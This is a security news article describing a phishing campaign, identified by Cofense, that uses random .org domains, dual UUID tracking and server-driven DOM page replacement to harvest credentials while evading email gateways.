A new phishing campaign utilizing randomly generated Universal Unique Identifiers (UUIDs) has been identified, successfully circumventing Secure Email Gateways (SEGs) and evading perimeter defenses.

The attack incorporates a JavaScript-based phishing script that combines random domain selection, dynamic UUID generation, and server-driven page replacement to acquire credentials.

The phishing script embeds malicious code within HTML attachments or spoofed file-sharing platforms such as Microsoft OneDrive, SharePoint Online, DocuSign, and Adobe Acrobat Sign.

When users interact with apparently legitimate documents, the script activates, selecting a random .org domain from nine predefined addresses.

These domains are bulk-generated without recognizable word patterns, designed to bypass blocklists and machine learning detection systems.

The script generates a dynamic UUID to track individual victims while using a hardcoded UUID as a campaign identifier.

Cofense researchers identified this tactic in early February 2025, noting its sophisticated and ongoing nature. The dual UUID mechanism is particularly uncommon in phishing operations.

Following domain selection and UUID generation, the script sends an HTTPS POST request to the server’s API endpoint.

The server responds with content tailored to the victim’s context, such as personalized corporate login pages, enabling webpage content replacement without altering URLs.

Dynamic Page Replacement

The dynamic page replacement capability manipulates browser sessions to deliver credential phishing pages without traditional redirects.

Instead of using window.location.href redirects, this script employs DOM manipulation techniques to replace page content with server-provided HTML.

This server-driven approach allows real-time customization based on victim context. When users enter email addresses, the script extracts domains and signals backend infrastructure to generate corresponding branded login pages.

This personalization enhances victim trust and reduces suspicion, facilitating successful credential harvesting and demonstrating the evolution of modern attacks beyond simple email deception.